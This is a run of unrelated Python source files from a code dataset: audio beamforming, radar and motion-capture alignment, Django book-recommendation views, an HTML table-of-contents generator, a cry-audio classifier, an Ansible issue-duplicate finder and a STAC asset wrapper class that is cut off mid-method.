self.eigenvector2 = np.linalg.eig(self.psd_speech)[0]\n\n def gcc_phat(self, sigl_fft, sigr_fft, max_delay, distance):\n \"\"\"\n Method for computing angle for a pair of microphones, used to localize the source.\n Not used in the main pipeline.\n \"\"\"\n sigr_fft_star = np.conj(sigr_fft)\n cc = sigl_fft * sigr_fft_star\n cc_phat = cc / abs(cc)\n r_phat = np.fft.irfft(cc_phat)[0:max_delay]\n return np.abs(self.compute_angle(np.argmax(r_phat), distance))\n\n def compute_angle(self, n, d):\n return np.arccos((1 / self.frequency * self.speed_of_sound * n) / d)\n\n def calc_angle(self, ffts):\n ang = self.gcc_phat(ffts[0, :], ffts[2, :], 6, 0.12) + self.gcc_phat(ffts[0, :], ffts[2, :], 9, 0.18)\n return ang/2\n\n def initialize(self):\n \"\"\"\n Initialize the model - preload and perform some dry runs o reduce latency\n \"\"\"\n self.model = keras.models.load_model(self.model_path)\n self.model._make_predict_function()\n self.input = self.model.input\n self.output = self.model.output\n self.session = K.get_session()\n # Three dry run to compile this magical device\n for i in range(3):\n prep = np.random.random([self.num_of_mics, 1, self.fft_len]).astype(np.float32)\n self.session.run(self.output,\n feed_dict={self.input: prep})\n\n\n def process(self, ffts):\n \"\"\"\n Process the sample - accepts single time frame with multiple channels.\n Returns beamformed signal. Uses LSTM masking as a part of beamforming process.\n \"\"\"\n if self.choose is not None:\n ffts = ffts[:, self.choose]\n prep = ffts.T.reshape(self.num_of_mics, 1, -1)\n prep = np.abs(prep)\n self.doa = self.doa_ma * self.doa + (1 - self.doa_ma) * self.calc_angle(ffts)\n response = self.session.run(self.output,\n feed_dict={self.input: prep})\n vad_mask = np.transpose(response, [2, 0, 1])\n vad_mean = vad_mask.mean((1,2))\n speech_update = vad_mean > self.mask_thresh_speech\n # print(speech_update.mean())\n noise_update = vad_mean < self.mask_thresh_noise\n # print(noise_update.mean())\n self.update_psds(ffts, speech_update, noise_update)\n self.update_ev_by_power_iteration()\n result_fftd = self.fast_mvdr(vad_mask.reshape(self.fft_len, self.num_of_mics) ** 2 * ffts).astype(np.complex64)\n return result_fftd.reshape(-1, 1)\n","sub_path":"mvdr_model.py","file_name":"mvdr_model.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"170095076","text":"def get_pos(motion, name):\r\n start_index = -1\r\n curr = 0\r\n for col in motion.columns:\r\n if col == name:\r\n start_index = curr\r\n break\r\n curr += 1\r\n start_index += 4\r\n ret = dict()\r\n ret['Time (Seconds)'] = motion.iloc[3:, 1]\r\n ret['Time (Seconds)'].index = range(len(ret['Time (Seconds)']))\r\n ret['X'] = motion.iloc[3:, start_index]\r\n ret['X'].index = range(len(ret['X']))\r\n ret['Y'] = motion.iloc[3:, start_index + 1]\r\n ret['Y'].index = range(len(ret['Y']))\r\n ret['Z'] = motion.iloc[3:, start_index + 2]\r\n ret['Z'].index = range(len(ret['Z']))\r\n return ret\r\n\r\n\r\ndef MC_tkf_timestamp(scan_data, platform_pos, range_bins, corner_reflector_pos):\r\n one_way_range = np.sqrt(np.sum(np.square(platform_pos - corner_reflector_pos[0]), axis=1))\r\n first_value = one_way_range[0]\r\n range_with_zeros = np.where(one_way_range == first_value, 0, one_way_range)\r\n indices = np.nonzero(range_with_zeros)\r\n # print(indices)\r\n tkf_scan_num = indices[0][0]\r\n return tkf_scan_num\r\n\r\n\r\n# function within a function; finds the time stamp at which the drone takes off relative to the radar's timer\r\ndef RD_tkf_timestamp(scan_data, platform_pos, range_bins, corner_reflector_pos, scan_timestamps):\r\n one_way_range = np.sqrt(np.sum(np.square(platform_pos - corner_reflector_pos[0]), axis=1))\r\n first_value = one_way_range[0]\r\n cr_first_rbin = np.argmin(np.abs(first_value - range_bins))\r\n num_scans = len(scan_data)\r\n for k in range(1, num_scans):\r\n current = scan_data[k, cr_first_rbin]\r\n previous = scan_data[k-1, cr_first_rbin]\r\n if np.abs(current - previous) > 4.5:\r\n return k\r\n\r\n\r\n# data align function (incomplete, nothing is there we just called our\r\n# functions here so the data align function doesnt throw an error)\r\ndef data_align(scan_data, platform_pos, range_bins, scan_timestamps, motion_timestamps, corner_reflector_pos):\r\n motion_change_time = MC_tkf_timestamp(scan_data, platform_pos, range_bins, corner_reflector_pos)\r\n radar_change_time = RD_tkf_timestamp(scan_data, platform_pos, range_bins, corner_reflector_pos, scan_timestamps)\r\n # print(data['scan_timestamps'])\r\n real_scan_times = scan_timestamps - scan_timestamps[0]\r\n # print(real_scan_times)\r\n tkf_motion_timestamp = motion_timestamps[motion_change_time]\r\n tkf_scan_timestamp = real_scan_times[radar_change_time]\r\n aligned_motion_times = motion_timestamps + (tkf_scan_timestamp - tkf_motion_timestamp)\r\n # print(tkf_scan_timestamp, tkf_motion_timestamp)\r\n # print(aligned_motion_times)\r\n return aligned_motion_times\r\n\r\n\r\ndef better_back_projection(data, resolution, xstart, xstop, ystart, ystop):\r\n fig = plt.figure()\r\n\r\n # Import the separate lists of data from the pickle file\r\n scan_data = data['scan_data']\r\n platform_pos = data['platform_pos'] # Create variable with all the platform positions\r\n platform_pos = np.asarray(platform_pos)\r\n range_bins = data['range_bins'] # Create variable with all of the range bins\r\n\r\n ret = np.zeros((int((xstop-xstart)/resolution), int((ystop-ystart)/resolution)), dtype=np.complex128)\r\n\r\n # Create variables (all of them are np arrays) that represent the x, y and z axis\r\n possible_x = np.linspace(xstart, xstop,\r\n num=int((xstop-xstart)/resolution))\r\n possible_y = np.linspace(ystart, ystop,\r\n num=int((ystop-ystart)/resolution))\r\n z_layer = np.zeros((int((xstop-xstart)/resolution), int((ystop-ystart)/resolution)))\r\n\r\n # Create an array of all possible points: Three layers, x, y, and z. z is always zero.\r\n points = np.meshgrid(possible_x, possible_y)\r\n points = np.asarray(points)\r\n points = np.stack((points[0], -points[1], z_layer))\r\n\r\n count = 0\r\n for pos in platform_pos:\r\n # Create another array of the same size, this time with the current position of the platform\r\n pos_x = [pos[0]] * int((xstop-xstart)/resolution)\r\n pos_y = [pos[1]] * int((ystop-ystart)/resolution)\r\n pos_z = np.zeros((int((xstop-xstart)/resolution), int((ystop-ystart)/resolution)))\r\n pos_z.fill(pos[2])\r\n posit = np.meshgrid(pos_x, pos_y)\r\n posit = np.asarray(posit)\r\n posit = np.stack((posit[0], posit[1], pos_z))\r\n\r\n # Create another array of the same size, with each value being the range from that point to the platform\r\n ranges = np.linalg.norm(np.subtract(points, posit), axis=0)\r\n\r\n # Add the value at the range for each point to the running total of values\r\n temp = ranges.flatten()\r\n results = np.reshape(np.interp(temp, range_bins[0], scan_data[count]), (int((xstop-xstart)/resolution),\r\n int((ystop-ystart)/resolution)))\r\n ret += results\r\n count += 1\r\n\r\n # Display the value\r\n plt.imshow(np.abs(ret))\r\n plt.show()\r\n plt.pause(5)\r\n return np.abs(ret)\r\n\r\n\r\n# diction = get_pos(data, \"LB_Marker\")\r\ndata['motion_timestamps'] = data_align(data['scan_data'], data['platform_pos'], data['range_bins'], data['scan_timestamps'],\r\n data['motion_timestamps'], data['corner_reflector_pos'])\r\n\r\nbetter_back_projection(data, 0.01, -3, 3, -3, 3)\r\n\r\n\r\n# print(diction['Time (Seconds)'])\r\n# print('\\n')\r\n# print(diction['X'])\r\n# print('\\n')\r\n# print(diction['Y'])\r\n# print('\\n')\r\n# print(diction['Z'])\r\n\r\n# extent=(left, right, bottom, top) - Changing axis, left right are min max X, bot top are min max Y.\r\n\r\nplt.imshow(np.abs(data['scan_data']),\r\n extent=(\r\n data['range_bins'][0, 0],\r\n data['range_bins'][0, -1],\r\n data['scan_timestamps'][-1] - data['scan_timestamps'][0],\r\n 0))\r\n \r\nplt.xlabel('Range (m)')\r\nplt.ylabel('Elapsed Time (s)')\r\n\r\nplt.plot(data['range_bins'][0], data['motion_timestamps'], 'r--')\r\n","sub_path":"raw_code/pulson440/otheralign.py","file_name":"otheralign.py","file_ext":"py","file_size_in_byte":5983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"470417462","text":"from rest_framework import permissions, decorators, exceptions, generics\nfrom utils import viewset, http_code\nfrom rest_framework import filters\nfrom utils.services import product as product_services\nfrom . import serializers, models, filters as product_filters\nfrom . import recommender\n\n\nclass ProductViewSet(viewset.BaseView):\n permission_classes = [\n permissions.AllowAny,\n ]\n serializer_classes = {\n \"item_create\": serializers.ItemCreateSerializer,\n \"item_info\": serializers.ItemInfoSerializer,\n }\n\n @decorators.action(\n methods=[\n \"POST\",\n ],\n detail=False,\n )\n def item_create(self, request):\n serializer = self.get_serializer(data=request.POST)\n print(request.POST.get(\"authors\"))\n try:\n serializer.is_valid(raise_exception=True)\n new_book = product_services.add_new_item(**serializer.validated_data)\n\n return self.get_response(data=new_book, error_code=http_code.HttpSuccess)\n\n except exceptions.ValidationError as e:\n return self.get_response(data=e.detail, error_code=e.status_code)\n\n @decorators.action(\n methods=[\n \"GET\",\n ],\n detail=False,\n )\n def item_info(self, request):\n\n book_id = request.GET.get(\"id\", None)\n print(book_id)\n try:\n from .models import Book\n\n book = Book.objects.get(uid=book_id)\n serializer = self.get_serializer(book)\n\n return self.get_response(\n data=serializer.data, error_code=http_code.HttpSuccess\n )\n\n except Exception as e:\n return self.get_response(data=str(e), error_code=500)\n\n\nclass PopularProduct(generics.ListAPIView):\n from rest_framework import pagination\n\n queryset = models.Book.objects.order_by(\"-rating_count\")\n serializer_class = serializers.ItemSerializer\n permission_classes = (permissions.AllowAny,)\n filter_backends = [\n filters.SearchFilter,\n product_filters.PriceFilter,\n product_filters.AuthorFilters,\n product_filters.CategoryFilter,\n product_filters.PublisherFilter,\n product_filters.RatingFilter,\n ]\n search_fields = [\"name\"]\n\n def list(self, request):\n from django.http import JsonResponse\n\n try:\n data = super().list(request).data\n # paginator = Paginator(data, 25)\n # print(data)\n return JsonResponse({\"data\": data, \"error_code\": 0})\n except Exception as e:\n print(f\"Exception while filtering: {e}\")\n return JsonResponse({\"data\": None, \"error_code\": 0})\n\n\n\nclass AuthorView(generics.ListAPIView):\n queryset = models.Author.objects.order_by(\"name\")\n serializer_class = serializers.AuthorSerializer\n permission_classes = (permissions.AllowAny,)\n filter_backends = []\n search_fields = [\"name\"]\n\n def list(self, request):\n from django.http import JsonResponse\n\n try:\n data = super().list(request).data\n\n # paginator = Paginator(data, 25)\n # print(data)\n return JsonResponse({\"data\": data, \"error_code\": 0})\n except Exception as e:\n print(f\"Exception while filtering: {e}\")\n return JsonResponse({\"data\": None, \"error_code\": 0})\n\n\n\nclass PublisherView(generics.ListAPIView):\n queryset = models.Book.objects.order_by(\"publisher\").values(\"publisher\").distinct()\n serializer_class = serializers.PublisherSerializer\n permission_classes = (permissions.AllowAny,)\n filter_backends = []\n search_fields = [\"name\"]\n\n def list(self, request):\n from django.http import JsonResponse\n\n try:\n data = super().list(request).data\n return JsonResponse({\"data\": data, \"error_code\": 0})\n except Exception as e:\n print(f\"Exception while filtering: {e}\")\n return JsonResponse({\"data\": None, \"error_code\": 0})\n\n\nclass RecommendProduct(generics.ListAPIView):\n from rest_framework import pagination\n\n queryset = models.Book.objects.all()\n serializer_class = serializers.ItemSerializer\n permission_classes = (permissions.AllowAny,)\n filter_backends = [filters.SearchFilter]\n search_fields = [\"name\"]\n # filter_backends = ()\n\n def list(self, request):\n from interaction.models import Interaction\n from product.models import Book\n from user_account.models import User\n\n try: \n user = request.GET.get('uid', None)\n\n user = User.objects.get(uid=user)\n\n except: \n return JsonResponse({\"data\": None, \"error_code\": 500})\n\n user_interaction = Interaction.objects.filter(user=user).order_by(\"-updated_at\")\n\n from django.http import JsonResponse\n print(user_interaction)\n # if len(user_interaction) <2 :\n # return JsonResponse({\"data\": None, \"error_code\": 0})\n\n rated_books = Book.objects.filter(\n uid__in=user_interaction.values_list(\"book__uid\")\n )\n\n categories = rated_books.values_list(\"categories\")\n\n # recommend_book = Book.objects.filter(categories__in=categories[:3]).exclude(\n # sku__in=rated_books\n # )\n\n recommend_book = Book.objects.exclude(\n uid__in=user_interaction.values_list(\"book__uid\")\n )\n\n recommend_book = recommend_book.exclude(\n rating_count__gte=50, rating_sum__lte=150\n )\n\n recommend_book = recommender.cf_filter(\n categories.values_list(\"categories__cf_index\", flat=True), recommend_book, 10\n )\n\n try:\n\n return JsonResponse(\n {\n \"data\": {\n \"recommended_books\": serializers.ItemSerializer(\n recommend_book, many=True\n ).data,\n \"rated_book\": serializers.ItemSerializer(\n rated_books, many=True\n ).data,\n },\n \"error_code\": 0,\n }\n )\n except Exception as e:\n print(f\"Exception while filtering: {e}\")\n return JsonResponse({\"data\": None, \"error_code\": 0})\n\n\nclass RecommendProductByIndex(generics.ListAPIView):\n from rest_framework import pagination\n\n queryset = models.Book.objects.all()\n serializer_class = serializers.ItemSerializer\n permission_classes = (permissions.AllowAny,)\n filter_backends = [filters.SearchFilter]\n search_fields = [\"name\"]\n # filter_backends = ()\n\n def list(self, request):\n # from interaction.models import Interaction\n # from product.models import Book\n from django.http import JsonResponse\n \n index_list = request.GET.get('index_list', '')\n index_list = list(map(int,index_list.split(',')))\n recommend_book = ','.join(map(str,recommender.cf_filter_by_sku(\n index_list, 10\n )))\n\n try:\n return JsonResponse(\n {\n \"data\": {\n \"sku_list\": recommend_book,\n },\n \"error_code\": 0,\n }\n )\n except Exception as e:\n print(f\"Exception while filtering: {e}\")\n return JsonResponse({\"data\": None, \"error_code\": 0})\nclass RelatedProduct(generics.ListAPIView):\n from rest_framework import pagination\n\n queryset = models.Book.objects.all()\n serializer_class = serializers.ItemSerializer\n permission_classes = (permissions.AllowAny,)\n filter_backends = [filters.SearchFilter, product_filters.ContentFilter]\n search_fields = [\"name\"]\n # filter_backends = ()\n\n def list(self, request):\n\n from django.http import JsonResponse\n\n try:\n\n data = super().list(request).data\n\n return JsonResponse({\"data\": data, \"error_code\": 0})\n except Exception as e:\n print(f\"Exception while filtering: {e}\")\n raise e\n return JsonResponse({\"data\": None, \"error_code\": 0})\n\n\nclass CategoryTree(generics.ListAPIView):\n queryset = models.Category.objects.all()\n serializer_class = serializers.CategorySerializer\n pagination_class = None\n\n def list(self, request):\n from django.http import JsonResponse\n\n data = super().list(request).data\n category_names = [d[\"name\"] for d in data]\n category_tree = {}\n for idx, category_name in enumerate(category_names):\n category_tree[category_name] = {\"children\": [], \"uid\": data[idx][\"uid\"]}\n for category in data:\n if category[\"parent\"]:\n category_tree[category[\"parent\"][\"name\"]][\"children\"].append(\n {category[\"name\"]: category_tree[category[\"name\"]]}\n )\n # print(category_tree)\n\n response_data = {\"root\": category_tree[\"root\"]}\n\n return JsonResponse({\"data\": response_data, \"error_code\": 0})\n","sub_path":"backend/product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"495381871","text":"#!/bin/python\n\nimport re\nimport sys\n\nclass MakeHeadings():\n\tregEx = ['([^<]*)',\n\t\t'']\n\terrorString = 'error'\n\n\tdef openFile(self, fileName):\n\t\tf = open(fileName, 'r', encoding=\"utf8\")\n\t\tfileContent = f.read()\n\t\tf.close()\n\t\treturn fileContent\n\n\tdef getInput(self):\n\t\tif len(sys.argv) == 1:\n\t\t\treturn self.errorString\n\t\telse:\n\t\t\treturn sys.argv[1]\n\n\tdef parseReplaceHtml(self, fileName, technique):\n\t\tif fileName != self.errorString:\n\t\t\tcontents = self.openFile(fileName)\n\t\t\tresults = re.findall(self.regEx[technique], contents, re.DOTALL)\n\t\t\tfileContent = '

Table of Contents

\\n'\n\t\t\tfileContent += '
    \\n'\n\t\t\tfor result in results:\n\t\t\t\tif technique == 0:\n\t\t\t\t\tindexTwo = 1\n\t\t\t\telse:\n\t\t\t\t\tindexTwo = 0\n\t\t\t\tfileContent += \"\\t
  • \" + result[indexTwo] + \"
  • \\n\"\n\t\t\tfileContent += '
\\n'\n\t\t\treturn fileContent\n\t\telse:\n\t\t\treturn 'pass in the name of the file you want to parse'\n\n\t# Not finished\n\tdef parseReplaceMarkdown(self, fileName):\n\t\tif fileName != self.errorString:\n\t\t\tcontents = self.openFile(fileName)\n\t\t\tresults = re.findall(self.regEx[1], contents, re.DOTALL)\n\t\t\tfileContent = '## Table of Contents\\n'\n\t\t\tfor result in results:\n\t\t\t\tfileContent += '[' + result[0] + '](#' + result[0] + \"]\"\n\t\t\treturn fileContent\n\t\telse:\n\t\t\treturn 'pass in the name of the file you want to parse'\n\n\tdef foo(self):\n\t\tprint(\"Barfoo\")\n\ndef bar(fileName):\n\tp = MakeHeadings()\n\treturn p.parseReplaceHtml(fileName, 0);\n\nprint(bar('PhoneGap.html'))\n#p = MakeHeadings()\n#p.foo()\n#p.parseReplace()\n","sub_path":"JavaScript/SystemCalls/PythonCall/python/MakeHeadings.py","file_name":"MakeHeadings.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"260666614","text":"\r\nfrom keras.models import load_model\r\nfrom python_speech_features import mfcc\r\nfrom scipy.io import wavfile\r\nfrom sklearn.metrics import accuracy_score\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nimport pandas as pd\r\nimport os\r\nimport pickle\r\n\r\n# gets rid of warning about unused cpu instructions\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\n\r\ndef build_predictions(audio_path):\r\n y_true = list()\r\n y_pred = list()\r\n file_name_prob = dict()\r\n\r\n print(\"Extracting features from audio\")\r\n for file in tqdm(os.listdir(audio_path)):\r\n rate, wav = wavfile.read(os.path.join(audio_path, file))\r\n label = file_2_class[file]\r\n class_index = classes.index(label)\r\n y_prob = list()\r\n for index in range(0, wav.shape[0]-config.step, config.step):\r\n sample = wav[index:index+config.step]\r\n x = mfcc(sample, rate, numcep=config.features, nfilt=config.filters, \r\n nfft=config.fourier_transforms)\r\n x = (x-config.min)/(config.max-config.min)\r\n if config.mode == \"cnn\":\r\n x = x.reshape(1, x.shape[0], x.shape[1], 1)\r\n elif config.mode == \"time\":\r\n x = np.expand_dims(x, axis=0)\r\n y_hat = model.predict(x)\r\n y_prob.append(y_hat)\r\n y_pred.append(np.argmax(y_hat))\r\n y_true.append(class_index)\r\n file_name_prob[file] = np.mean(y_prob, axis=0).flatten()\r\n \r\n return y_true, y_pred, file_name_prob\r\n\r\ndata_frame = pd.read_csv(\"cries.csv\")\r\nclasses = list(np.unique(data_frame.label))\r\nfile_2_class = dict(zip(data_frame.fname, data_frame.label))\r\npickle_path = os.path.join(\"pickles\", \"cnn.p\")\r\n\r\nwith open(pickle_path, \"rb\") as handle:\r\n config = pickle.load(handle)\r\n\r\nmodel = load_model(config.model_path)\r\n\r\ny_true, y_pred, file_name_prob = build_predictions(\"clean\")\r\naccuracy = accuracy_score(y_true=y_true, y_pred=y_pred)\r\n\r\ny_probs = list()\r\nfor index, row in data_frame.iterrows():\r\n y_prob = file_name_prob[row.fname]\r\n y_probs.append(y_prob)\r\n for c, p in zip(classes, y_prob):\r\n data_frame.at[index, c] = p\r\n\r\ny_pred = [classes[np.argmax(y)] for y in y_probs]\r\ndata_frame[\"y_pred\"] = y_pred\r\ndata_frame.to_csv(\"prediction.csv\", index=False)\r\n","sub_path":"audio-classification/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"282348818","text":"#!/usr/bin/env python\n\nimport json\n\nfrom pprint import pprint\n# ratio = fw_fuzz.ratio(cr, k)\nfrom fuzzywuzzy import fuzz\nfrom textblob import TextBlob\n\nfrom utils.elastic import raw_es_sql_query\nfrom utils.webscraper import GithubWebScraper\n\ngws = GithubWebScraper(cachedir='/data/ssd/github_dashboard')\nansible_summaries = gws.get_issue_summaries('https://github.com/ansible/ansible')\ncore_summaries = gws.get_issue_summaries('https://github.com/ansible/ansible-modules-core')\nextras_summaries = gws.get_issue_summaries('https://github.com/ansible/ansible-modules-extras')\n\n\ncolumns = 'github_url,github_repo,github_number,state,merged,title'\nqs = 'SELECT %s FROM github' % columns\nresults = raw_es_sql_query(qs, scroll=True)\n\ntitles = [x['_source']['title'] for x in results['hits']['hits']]\ntitles = sorted(set(titles))\nhits = [x for x in results['hits']['hits']]\n\n\n'''\nfor hit in hits:\n number = hit['_source']['github_number']\n state = hit['_source']['state']\n\n summary = None\n if hit['_source']['github_repo'] == 'ansible':\n summary = ansible_summaries.get(str(number))\n elif hit['_source']['github_repo'] == 'ansible-modules-core':\n summary = core_summaries.get(str(number))\n elif hit['_source']['github_repo'] == 'ansible-modules-extras':\n summary = extras_summaries.get(str(number))\n\n if state != summary.get('state'):\n import epdb; epdb.st()\nsys.exit(1)\n'''\n\n#DUPES = []\n\n'''\nfor idx,title in enumerate(titles):\n print idx\n matches = [x for x in hits if x['_source']['title'] == title]\n\n if len(matches) > 1:\n\n mstates = sorted(set([x['_source']['state'] for x in matches]))\n if mstates == ['closed']:\n continue\n\n apts = [x for x in matches if x['_source']['github_repo'] == 'ansible']\n\n if len(apts) > 1:\n DUPES.append((title, matches))\n import epdb; epdb.st()\n'''\n\n'''\nDUPES = []\ntitles = sorted(set([x.strip() for x in titles]))\ntest_hits = [x for x in hits]\ntest_titles = sorted(set([x['_source']['title'] for x in test_hits]))\ntest_titles = sorted(set([x.strip() for x in test_titles]))\n\nwhile titles:\n total = len(titles)\n for idx,title in enumerate(titles):\n print idx,total\n titles.remove(title)\n\n matches = []\n\n for itx,tx in enumerate(test_titles):\n if tx == title:\n continue\n ratio = fuzz.ratio(title,tx)\n\n if ratio > 75:\n matches.append(tx)\n #import epdb; epdb.st()\n\n if matches:\n\n # reduce the list\n for x in matches:\n test_titles.remove(x)\n if x in titles:\n titles.remove(x)\n\n DUPES.append((title,matches))\n pprint((title,matches))\n break\n #import epdb; epdb.st()\n\nopen('/tmp/test.json', 'wb').write(json.dumps(DUPES, indent=2))\nimport epdb; epdb.st()\n'''\n\nwith open('/tmp/dupes.json', 'rb') as f:\n DUPES = json.loads(f.read())\n\nall_dupes = []\ndhits = [x for x in hits]\nfor dupe in DUPES:\n\n dtitles = dupe[1] + [dupe[0]]\n dtitles = sorted(set(dtitles))\n\n hdupes = []\n for x in dhits:\n if x['_source']['title'].strip() in dtitles:\n hdupes.append(x)\n dhits.remove(x)\n if hdupes:\n\n hstates = sorted(set([x['_source']['state'] for x in hdupes]))\n if hstates != ['closed']:\n all_dupes.append(hdupes)\n #import epdb; epdb.st()\n\nopen('/tmp/fuzzy_dupes.json', 'wb').write(json.dumps(all_dupes, indent=2))\nimport epdb; epdb.st()\n","sub_path":"test_title_matcher.py","file_name":"test_title_matcher.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"32549492","text":"import pathlib\nimport re\nfrom copy import deepcopy\n\nimport boto3\nimport botocore.exceptions\n\nfrom datetime import date, datetime, timezone\nfrom typing import Union, Iterator, List, Optional, Tuple, Dict\n\nfrom epl.protobuf.v1.geometry_pb2 import ProjectionData\nfrom google.protobuf.any_pb2 import Any\nfrom google.protobuf.wrappers_pb2 import FloatValue\nfrom epl.geometry import BaseGeometry, Polygon\nfrom typing.io import BinaryIO, IO\n\nfrom nsl.stac import StacItem, StacRequest, View, ViewRequest, \\\n Mosaic, MosaicRequest, Eo, EoRequest, EnvelopeData, FloatFilter, Asset, enum, utils\nfrom nsl.stac.client import NSLClient\nfrom nsl.stac import stac_service as stac_singleton\n\n\ndef _set_properties(stac_data, properties, type_url_prefix):\n \"\"\"\n pack properties and then set the properties member value to the input.\n :param stac_data:\n :param properties:\n :param type_url_prefix:\n :return:\n \"\"\"\n if properties is None:\n return\n\n # pack the properties into an Any field\n packed_properties = Any()\n packed_properties.Pack(properties,\n type_url_prefix=type_url_prefix + properties.DESCRIPTOR.full_name)\n\n # overwrite the previous properties field with this updated version\n stac_data.properties.CopyFrom(packed_properties)\n properties = properties\n return stac_data, properties\n\n\ndef _check_assets_exist(stac_item: StacItem, b_raise=True) -> List[str]:\n results = []\n for asset_key in stac_item.assets:\n asset = stac_item.assets[asset_key]\n b_file_exists = _check_asset_exists(asset)\n\n if not b_file_exists and b_raise:\n raise ValueError(\"get_blob_metadata returns false for asset key {}\".format(asset_key))\n results.append(asset_key)\n return results\n\n\ndef _check_asset_exists(asset: Asset) -> bool:\n if asset.cloud_platform == enum.CloudPlatform.GCP:\n return utils.get_blob_metadata(bucket=asset.bucket, blob_name=asset.object_path) is not None\n elif asset.cloud_platform == enum.CloudPlatform.AWS:\n return _check_aws_asset_exists(asset)\n else:\n raise ValueError(\"cloud platform {0} of asset {1} not supported\"\n .format(enum.CloudPlatform(asset.cloud_platform).name, asset))\n\n\ndef _check_aws_asset_exists(asset: Asset) -> bool:\n s3 = boto3.client('s3')\n\n try:\n s3.head_object(Bucket=asset.bucket, Key=asset.object_path, RequestPayer='requester')\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == \"404\":\n return False\n else:\n raise e\n return True\n\n\nclass AssetWrap(object):\n def __init__(self,\n asset: Asset = None,\n bucket: str = None,\n object_path: str = None,\n asset_type: enum.AssetType = enum.AssetType.UNKNOWN_ASSET,\n eo_bands: enum.Band = enum.Band.UNKNOWN_BAND,\n href=\"\",\n cloud_platform: enum.CloudPlatform = enum.CloudPlatform.UNKNOWN_CLOUD_PLATFORM,\n bucket_manager: str = \"\",\n bucket_region: str = \"\",\n key_suffix: str = \"\",\n asset_key: str = \"\"):\n self._asset_key = asset_key\n if asset is None:\n asset = Asset(href=href,\n eo_bands=eo_bands,\n asset_type=asset_type,\n cloud_platform=cloud_platform,\n bucket_manager=bucket_manager,\n bucket_region=bucket_region,\n bucket=bucket,\n object_path=object_path)\n\n self._asset = asset\n\n if self._asset.bucket is None or self._asset.object_path is None:\n raise ValueError(\"bucket and object path must be set in valid asset\")\n\n self._ext = pathlib.Path(self._asset.object_path).suffix\n\n b_thumbnail_png = self._asset.asset_type == enum.AssetType.THUMBNAIL and self._ext == '.png'\n _, href_type = self._asset_type_details(asset_type=self._asset.asset_type, b_thumbnail_png=b_thumbnail_png)\n self._asset.type = href_type\n self._type = href_type\n self._key_suffix = key_suffix\n\n def __eq__(self, other):\n if not isinstance(other, AssetWrap):\n return False\n\n if self.asset_key != other.asset_key:\n return False\n\n return self.equals_pb(other._asset)\n\n def __str__(self):\n return str(\"{0}extension: {1}\\nasset_key: {2}\".format(self._asset, self._ext, self.asset_key))\n\n def __copy__(self):\n pass\n\n def __deepcopy__(self, memo):\n cls = self.__class__\n result = cls.__new__(cls)\n memo[id(self)] = result\n for k, v in self.__dict__.items():\n if k == '_asset':\n value = Asset()\n value.CopyFrom(v)\n setattr(result, k, value)\n else:\n setattr(result, k, deepcopy(v))\n return result\n\n def _asset_key_prefix(self) -> str:\n if self.eo_bands == enum.Band.UNKNOWN_BAND:\n return \"{0}_{1}\".format(self.asset_type.name, self.cloud_platform.name)\n return \"{0}_{1}_{2}\".format(self.asset_type.name, self.eo_bands.name, self.cloud_platform.name)\n\n @property\n def asset(self) -> Asset:\n return self._asset\n\n @property\n def asset_key(self) -> str:\n if self._asset_key:\n return self._asset_key\n\n asset_key = self._asset_key_prefix()\n if self._key_suffix:\n asset_key += \"_{}\".format(self._key_suffix)\n return asset_key\n\n @property\n def asset_key_suffix(self) -> str:\n return self._key_suffix\n\n @asset_key_suffix.setter\n def asset_key_suffix(self, value: str):\n self._key_suffix = value\n\n @property\n def asset_type(self) -> enum.AssetType:\n \"\"\"\ntype of asset\n :return:\n \"\"\"\n return enum.AssetType(self._asset.asset_type)\n\n @property\n def bucket(self) -> str:\n \"\"\"\nbucket where data stored. may be private\n :return:\n \"\"\"\n return self._asset.bucket\n\n @property\n def bucket_manager(self) -> str:\n return self._asset.bucket_manager\n\n @property\n def bucket_region(self) -> str:\n return self._asset.bucket_region\n\n @property\n def cloud_platform(self) -> enum.CloudPlatform:\n \"\"\"\ncloud platform where data stored. Google Cloud, AWS and Azure are current options (or unknown)\n :return:\n \"\"\"\n return enum.CloudPlatform(self._asset.cloud_platform)\n\n @cloud_platform.setter\n def cloud_platform(self, value: enum.CloudPlatform):\n self._asset.cloud_platform = value\n\n @property\n def eo_bands(self) -> enum.Band:\n \"\"\"\nelectro optical bands included in data. if data is not electro optical, then this is set to Unknown\n :return:\n \"\"\"\n return enum.Band(self._asset.eo_bands)\n\n @property\n def ext(self) -> str:\n return self._ext\n\n @property\n def href(self) -> str:\n \"\"\"\nthe href for downloading data\n :return:\n \"\"\"\n return self._asset.href\n\n @href.setter\n def href(self, value: str):\n self._asset.href = value\n\n @property\n def object_path(self) -> str:\n \"\"\"\nthe object path to use with the bucket if access is available\n :return:\n \"\"\"\n return self._asset.object_path\n\n @object_path.setter\n def object_path(self, value: str):\n self._asset.object_path = value\n\n @property\n def type(self) -> str:\n return self._type\n\n def equals_pb(self, other: Asset):\n \"\"\"\ndoes the AssetWrap equal a protobuf Asset\n :param other:\n :return:\n \"\"\"\n return self._asset.SerializeToString() == other.SerializeToString()\n\n def exists(self) -> bool:\n return _check_asset_exists(self._asset)\n\n def download(self,\n from_bucket: bool = False,\n file_obj: IO[Union[Union[str, bytes], Any]] = None,\n save_filename: str = '',\n save_directory: str = '',\n requester_pays: bool = False,\n nsl_id: str = None) -> str:\n return utils.download_asset(asset=self._asset,\n from_bucket=from_bucket,\n file_obj=file_obj,\n save_filename=save_filename,\n save_directory=save_directory,\n requester_pays=requester_pays,\n nsl_id=nsl_id)\n\n @staticmethod\n def _asset_type_details(asset_type: enum.AssetType, 